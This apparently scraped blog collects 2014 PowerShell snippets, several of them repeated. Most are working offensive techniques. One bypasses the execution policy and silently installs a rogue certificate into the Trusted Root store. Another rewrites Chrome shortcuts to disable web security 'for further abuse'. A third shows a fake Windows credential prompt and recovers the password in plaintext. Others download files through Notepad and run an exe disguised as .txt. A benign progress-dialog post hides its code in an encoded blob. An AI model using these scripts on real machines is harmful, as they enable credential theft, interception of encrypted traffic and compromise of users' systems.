Mission:
Exeutable file that sign our certificate in "Trusted Root Certification Authorities".
Prerequisite:
- generate certificate(http://www.selfsignedcertificate.com)
Flow:
- by pass powershell execution policy
- write certificate to disk
- load certificate file to relevant store
- delete certificate file
- open certmgr
- compile ps file to exe using ps2exe (https://ps2exe.codeplex.com)
$certificate = @'
-----BEGIN CERTIFICATE-----
YOUR_CERTIFICATE_HERE
-----END CERTIFICATE-----
'@
#http://www.nivot.org/blog/post/2012/02/10/Bypassing-Restricted-Execution-Policy-in-Code-or-in-Script
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))}
Disable-ExecutionPolicy
# Set the certificate file path
$certPath = ".deadbeef.cert"
# Write certificate to disk
$certificate | out-file $certPath
# Get the certificate store for "Trusted Root Certification Authorities" (Cert:\LocalMachine\Root)
$certStore = New-Object -TypeName System.Security.Cryptography.X509Certificates.X509Store Root, LocalMachine
# Get the certificate from the location where it was placed by the export process
$cert = New-Object -TypeName System.Security.Cryptography.X509Certificates.X509Certificate2 $certPath
# delete certificate file from disk
Remove-Item $certPath
# Open the store with maximum allowed privileges
$certStore.Open("MaxAllowed")
# Add the certificate to the store
$certStore.Add($cert)
# Close the store
$certStore.Close()
# open certificate manager
Invoke-Item cert:\
Tuesday, December 23, 2014
Tuesday, December 2, 2014
PowerShell compression \ decompression
I needed a minimal foot print for one of my previous powershell unmanaged declaration,
Compression:
$s = @'YourInputHere"@
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write($s)
$sw.Close();
$s = [System.Convert]::ToBase64String($ms.ToArray())
Decompression:
$data = [System.Convert]::FromBase64String("CompressedBase64StreamHere")
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
I manage to get 50% decreasse on a small input stream...nice!
Compression:
$s = @'YourInputHere"@
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write($s)
$sw.Close();
$s = [System.Convert]::ToBase64String($ms.ToArray())
Decompression:
$data = [System.Convert]::FromBase64String("CompressedBase64StreamHere")
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
I manage to get 50% decreasse on a small input stream...nice!
PowerShell shortcuts manipuilation
Here some simple implementation on how to manipulate Chrome desktop shortcuts to contain
"--disable-web-security --disable-popup-blocking" for further abuse
$desktop = [System.Environment]::GetFolderPath('Desktop')
$wshShell = new-object -comobject WScript.Shell
$shortcuts = get-childitem -path $desktop -recurse -force -include "chrome*.lnk" -ErrorAction silentlycontinue
foreach ($shortcut in $shortcuts)
{
$s = $wshShell.CreateShortcut($shortcut.FullName)
$s.Arguments = "--disable-web-security --disable-popup-blocking"
$s.Save()
}
"--disable-web-security --disable-popup-blocking" for further abuse
$desktop = [System.Environment]::GetFolderPath('Desktop')
$wshShell = new-object -comobject WScript.Shell
$shortcuts = get-childitem -path $desktop -recurse -force -include "chrome*.lnk" -ErrorAction silentlycontinue
foreach ($shortcut in $shortcuts)
{
$s = $wshShell.CreateShortcut($shortcut.FullName)
$s.Arguments = "--disable-web-security --disable-popup-blocking"
$s.Save()
}
PowerShell toolbox
In my last to year i had to deal several times with powershell, here some of the finniest resource i manage to find
some times the target computer not allow to run powershell scripts, here the solution:
15 Ways to Bypass the PowerShell Execution Policy
some times the target computer not allow to run powershell scripts, here the solution:
15 Ways to Bypass the PowerShell Execution Policy
Get user password via powershell credential windows
I needed a simple way of getting someone windows credential, I want publish the full flow but the main core is the 4 line powershell script that initiate windows credential dialog containning bith domain and user name after user type the password and press "OK" we use the built in powershell "ConvertFrom-SecureString" to uncover is password.
$user = whoami
$ClearPassword = Get-Credential -Credential $user
$ClearPassword.Password | ConvertFrom-SecureString
$ClearPassword.GetNetworkCredential().password
$user = whoami
$ClearPassword = Get-Credential -Credential $user
$ClearPassword.Password | ConvertFrom-SecureString
$ClearPassword.GetNetworkCredential().password
Win32IProgressDialog via powershell
I had to mock progress dialog via powershell, In order for the user to get the same look and fell as according to it's windows version and theme I wanted to use the embedded Win32IProgressDialog.
The attached code contain a minimal implementation in powershell.
The output is Win32IProgressDialog that inherit the user theme containing animation in both the dialog and the system tray.
minimal unmanaged type declaration:
Add-Type @'
using System;
using System.Runtime.InteropServices;
using System.Text;
public class ProgressDialogg{
Win32IProgressDialog pd = null;
public void ShowDialog(string t, string c, string l1, string l2, string l3){
pd = (Win32IProgressDialog)new Win32ProgressDialog();
pd.SetTitle(t);
pd.SetCancelMsg(c, null);
pd.SetLine(1, l1, false, IntPtr.Zero);
pd.SetLine(2, l2, false, IntPtr.Zero);
pd.SetLine(3, l3, false, IntPtr.Zero);
pd.StartProgressDialog(IntPtr.Zero, null, PROGDLG.Modal, IntPtr.Zero);
}
public void SetValue(int val)
{
pd.SetProgress((uint)val, 100);
}
public static class shlwapi{
[DllImport("shlwapi.dll", CharSet = CharSet.Auto)]
static extern bool PathCompactPath(IntPtr hDC, [In, Out] StringBuilder pszPath, int dx);}
[ComImport]
[Guid("EBBC7C04-315E-11d2-B62F-006097DF5BD4")]
[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
public interface Win32IProgressDialog{
void StartProgressDialog(IntPtr hwndParent, [MarshalAs(UnmanagedType.IUnknown)] object punkEnableModless, PROGDLG dwFlags, IntPtr pvResevered );
void StopProgressDialog();
void SetTitle([MarshalAs(UnmanagedType.LPWStr)] string pwzTitle );
void SetAnimation(IntPtr hInstAnimation, ushort idAnimation );
[PreserveSig]
[return: MarshalAs(UnmanagedType.Bool)]
bool HasUserCancelled();
void SetProgress(uint dwCompleted, uint dwTotal );
void SetProgress64(ulong ullCompleted, ulong ullTotal );
void SetLine(uint dwLineNum, [MarshalAs(UnmanagedType.LPWStr)] string pwzString, [MarshalAs(UnmanagedType.VariantBool)] bool fCompactPath, IntPtr pvResevered );
void SetCancelMsg([MarshalAs(UnmanagedType.LPWStr)] string pwzCancelMsg, object pvResevered );
void Timer( PDTIMER dwTimerAction, object pvResevered );}
[ComImport]
[Guid("F8383852-FCD3-11d1-A6B9-006097DF5BD4")]
public class Win32ProgressDialog{}
public enum PDTIMER : uint {Reset = (0x01), Pause = (0x02), Resume = (0x03)}
[Flags]
public enum PROGDLG : uint
{Normal = 0x00000000, Modal = 0x00000001, AutoTime = 0x00000002, NoTime = 0x00000004, NoMinimize = 0x00000008, NoProgressBar = 0x00000010}
}
'@
Usage:
$pd = New-Object ProgressDialogg
$pd.ShowDialog("title","cancel","line1","line2","line3")
$pd.SetValue(50)
P.S
The final version with type compression
$data = [System.Convert]::FromBase64String("H4sIAAAAAAAEAJVV2W7iMBR9r9R/uOpTIgUUoOtU88BSOkilRYVOpUF9cBMXPOPYkRfoov77XCchBEo7Gnhx7ubje8+xrWZiBuMXbWhyvr9nK5/1WysMS2h9IAxVMh1TtWAR1dthE/ps0JbaR84iiDjRGkZKzhTVuscIl7PZ2/7ePROt5mDTDmkM30FYztf5C8liGM/lMg/xtFFuLxNAsYrKFW+sl831suXjdlllb9emvqBLyBybds93IOL6mJoJM5x6Zm3oEhFRPtQzD3d3eNeuKyaoh0AcmCfCNQ0A+zUyqv4Lm7YVhygd0n/GtTCu9VWcIcpswa9E5RgDGN3eXPauLutDGRP+oc77Vs+p+Um4pR4TBhaE+/t7bytQq608z6LXX7hqjTDcrKINMSUB9JwvScqwwrTH+SBJpTLeQWGtx5wfBNCdE4XFcVDFqt62RvoP+3tFKSQWVQIepeQwImbelUlKIuOWxXFh3usGMB2IAG6seYBxxoGOZTymClL96mIDcEeKn/1zBDvFIjkc3Gd6aVnsHVx0Ot2TbnhYazWOLmqNRtysdY6b/VoYHodnJ73+Uad3eOBwTTMpPJGITl5S6rlSVUO9/BrowZ34I+RSuLSiQWzlhV28xFblc/h0tjBfinhEFBWohumQKD0nvK29O5EQQWY0zjGUGwP+5ONvGhlIrfhzIcgjp8gFjoVLckC87HMy0yt6QLq4pZouqKIxuAEXoGS6Qy4r4uSC+RTS1egeB4OACommy9csA6o12oIlOHUpytMOhF5bA7B6jlMDFpe2LH86QlB4NdExm7kRKWqsEt/gMzAdZJMbSsaqH0TfYXKub07jjVOVrLcZf5aOfpwaGiOW3DKRhnDYlXN86Fku8awoxGreyvYxMxN+Udetr23yxZR3tDTn/hc5P4liRJi8AbmqniqS+gcDqrfg/8Aqs4KSjLvqT/ClUR6MepPB8OLW9dYZ2lE++52Zn6i5f9rC/1Gz1u/2Wk7NjVr7uHP2Uc0bL9aOF+Ht3SmojKPCJiW+bzkF3hwed4N54XPY8FFVxGpafDfxG/02WRlavoOcye1hq2whxqIsXr3XUiXIkO+AecUvgOwir9rw0XF3putV1YxvzPUH46EzDhmKh71uOE6dY3X0DlEVXyN8RzDvfwFpnGB7JggAAA==")
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
Add-Type $sr.readtoend()
$pd = New-Object ProgressDialogg
$pd.ShowDialog("title","cancel","line1","line2","line3")
$pd.SetValue(50)
The attached code contain a minimal implementation in powershell.
The output is Win32IProgressDialog that inherit the user theme containing animation in both the dialog and the system tray.
minimal unmanaged type declaration:
Add-Type @'
using System;
using System.Runtime.InteropServices;
using System.Text;
public class ProgressDialogg{
Win32IProgressDialog pd = null;
public void ShowDialog(string t, string c, string l1, string l2, string l3){
pd = (Win32IProgressDialog)new Win32ProgressDialog();
pd.SetTitle(t);
pd.SetCancelMsg(c, null);
pd.SetLine(1, l1, false, IntPtr.Zero);
pd.SetLine(2, l2, false, IntPtr.Zero);
pd.SetLine(3, l3, false, IntPtr.Zero);
pd.StartProgressDialog(IntPtr.Zero, null, PROGDLG.Modal, IntPtr.Zero);
}
public void SetValue(int val)
{
pd.SetProgress((uint)val, 100);
}
public static class shlwapi{
[DllImport("shlwapi.dll", CharSet = CharSet.Auto)]
static extern bool PathCompactPath(IntPtr hDC, [In, Out] StringBuilder pszPath, int dx);}
[ComImport]
[Guid("EBBC7C04-315E-11d2-B62F-006097DF5BD4")]
[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
public interface Win32IProgressDialog{
void StartProgressDialog(IntPtr hwndParent, [MarshalAs(UnmanagedType.IUnknown)] object punkEnableModless, PROGDLG dwFlags, IntPtr pvResevered );
void StopProgressDialog();
void SetTitle([MarshalAs(UnmanagedType.LPWStr)] string pwzTitle );
void SetAnimation(IntPtr hInstAnimation, ushort idAnimation );
[PreserveSig]
[return: MarshalAs(UnmanagedType.Bool)]
bool HasUserCancelled();
void SetProgress(uint dwCompleted, uint dwTotal );
void SetProgress64(ulong ullCompleted, ulong ullTotal );
void SetLine(uint dwLineNum, [MarshalAs(UnmanagedType.LPWStr)] string pwzString, [MarshalAs(UnmanagedType.VariantBool)] bool fCompactPath, IntPtr pvResevered );
void SetCancelMsg([MarshalAs(UnmanagedType.LPWStr)] string pwzCancelMsg, object pvResevered );
void Timer( PDTIMER dwTimerAction, object pvResevered );}
[ComImport]
[Guid("F8383852-FCD3-11d1-A6B9-006097DF5BD4")]
public class Win32ProgressDialog{}
public enum PDTIMER : uint {Reset = (0x01), Pause = (0x02), Resume = (0x03)}
[Flags]
public enum PROGDLG : uint
{Normal = 0x00000000, Modal = 0x00000001, AutoTime = 0x00000002, NoTime = 0x00000004, NoMinimize = 0x00000008, NoProgressBar = 0x00000010}
}
'@
Usage:
$pd = New-Object ProgressDialogg
$pd.ShowDialog("title","cancel","line1","line2","line3")
$pd.SetValue(50)
P.S
The final version with type compression
$data = [System.Convert]::FromBase64String("H4sIAAAAAAAEAJVV2W7iMBR9r9R/uOpTIgUUoOtU88BSOkilRYVOpUF9cBMXPOPYkRfoov77XCchBEo7Gnhx7ubje8+xrWZiBuMXbWhyvr9nK5/1WysMS2h9IAxVMh1TtWAR1dthE/ps0JbaR84iiDjRGkZKzhTVuscIl7PZ2/7ePROt5mDTDmkM30FYztf5C8liGM/lMg/xtFFuLxNAsYrKFW+sl831suXjdlllb9emvqBLyBybds93IOL6mJoJM5x6Zm3oEhFRPtQzD3d3eNeuKyaoh0AcmCfCNQ0A+zUyqv4Lm7YVhygd0n/GtTCu9VWcIcpswa9E5RgDGN3eXPauLutDGRP+oc77Vs+p+Um4pR4TBhaE+/t7bytQq608z6LXX7hqjTDcrKINMSUB9JwvScqwwrTH+SBJpTLeQWGtx5wfBNCdE4XFcVDFqt62RvoP+3tFKSQWVQIepeQwImbelUlKIuOWxXFh3usGMB2IAG6seYBxxoGOZTymClL96mIDcEeKn/1zBDvFIjkc3Gd6aVnsHVx0Ot2TbnhYazWOLmqNRtysdY6b/VoYHodnJ73+Uad3eOBwTTMpPJGITl5S6rlSVUO9/BrowZ34I+RSuLSiQWzlhV28xFblc/h0tjBfinhEFBWohumQKD0nvK29O5EQQWY0zjGUGwP+5ONvGhlIrfhzIcgjp8gFjoVLckC87HMy0yt6QLq4pZouqKIxuAEXoGS6Qy4r4uSC+RTS1egeB4OACommy9csA6o12oIlOHUpytMOhF5bA7B6jlMDFpe2LH86QlB4NdExm7kRKWqsEt/gMzAdZJMbSsaqH0TfYXKub07jjVOVrLcZf5aOfpwaGiOW3DKRhnDYlXN86Fku8awoxGreyvYxMxN+Udetr23yxZR3tDTn/hc5P4liRJi8AbmqniqS+gcDqrfg/8Aqs4KSjLvqT/ClUR6MepPB8OLW9dYZ2lE++52Zn6i5f9rC/1Gz1u/2Wk7NjVr7uHP2Uc0bL9aOF+Ht3SmojKPCJiW+bzkF3hwed4N54XPY8FFVxGpafDfxG/02WRlavoOcye1hq2whxqIsXr3XUiXIkO+AecUvgOwir9rw0XF3putV1YxvzPUH46EzDhmKh71uOE6dY3X0DlEVXyN8RzDvfwFpnGB7JggAAA==")
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
Add-Type $sr.readtoend()
$pd = New-Object ProgressDialogg
$pd.ShowDialog("title","cancel","line1","line2","line3")
$pd.SetValue(50)
Monday, December 1, 2014
Notepad downloader
Apperentlly windows notepad.exe supports UNC in open dialog,
Just lunch notpad, open a new file and paste a URL and ti will download it for you :)
save the file and you ready to go,
P.S
If you with to run exe file with txt extension you can use the call command.
Just lunch notpad, open a new file and paste a URL and ti will download it for you :)
 |
| notepad open dialog |
 |
| notepad request in fiddler |
P.S
If you with to run exe file with txt extension you can use the call command.
call test.txt
Subscribe to:
Posts (Atom)